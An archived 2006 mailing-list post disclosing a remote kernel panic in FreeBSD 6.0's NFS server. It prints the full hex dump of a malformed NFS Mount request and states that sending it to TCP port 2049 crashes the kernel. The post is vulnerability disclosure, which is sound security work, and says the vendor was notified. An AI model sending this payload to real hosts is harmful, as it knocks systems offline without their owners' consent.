OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
[Dailydave] fun with FreeBSD kernel

From: Evgeny Legerov (admingleg.net)
Date: Sun Feb 26 2006 - 10:10:42 CST


Hi,

ProtoVer NFS testsuite 1.0 uncovered remote kernel panic vulnerability in FreeBSD 6.0 kernel.

The hex dump of NFS Mount request:
"""
 80 00 00 00 00 00 00 01 00 00 00 00 00 00 00 02
 00 01 86 a5 00 00 00 01 00 00 00 01 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04
 2f 74 6d 70
"""

To trigger the bug, send the above request to 2049 TCP port
of a FreeBSD machine running nfsd.

FreeBSD team has been notified more than two weeks ago.

Regards,
Evgeny Legerov
www.gleg.net